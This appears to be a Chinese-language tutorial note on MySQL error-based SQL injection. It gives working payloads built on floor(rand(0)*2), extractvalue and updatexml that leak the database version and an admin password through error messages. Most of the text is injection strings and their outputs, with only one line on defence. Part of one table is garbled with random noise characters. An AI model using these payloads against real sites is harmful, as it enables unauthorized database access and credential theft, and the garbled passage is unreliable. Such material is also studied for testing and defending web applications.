放点原来的笔记:MySQL在执行语句出错时会抛出异常信息,而PHP+MySQL架构的网站往往又把数据库错误信息直接显示在页面上,这样就可以通过构造如下三种方法获取特定数据。(从防御角度看,关闭页面上的数据库错误回显并使用参数化查询,即可阻断这类信息泄露。)
实际测试环境:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
) v% j* |' a4 j, ~2 g5 {+---------+------------------+------+-----+---------+----------------+
. I4 E9 f+ X6 M7 T3 }. m( W) Y5 V/ l _ y| Field | Type | Null | Key | Default | Extra |' d4 Z' Q( L! ?; Y$ C2 e# y
+---------+------------------+------+-----+---------+----------------+
0 {- [! E* H. E2 Y! o+ || id | int(10) unsigned | NO | PRI | NULL | auto_increment |
/ H5 r9 k7 |( [| title | varchar(50) | NO | | NULL | |5 W& x1 t% R6 L o
| content | varchar(50) | NO | | NULL | |9 f$ V3 g- l2 J! V$ Q! F. C/ O! f
+---------+------------------+------+-----+---------+----------------+
1、通过floor报错
可以通过如下一些利用代码:

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下:
首先进行正常查询:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了MySQL的版本;如果需要查询其他数据,可以修改version()所在位置的语句进行查询。
例如我们需要查询管理员用户名和密码:
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
That's all; thanks to the foreign guys.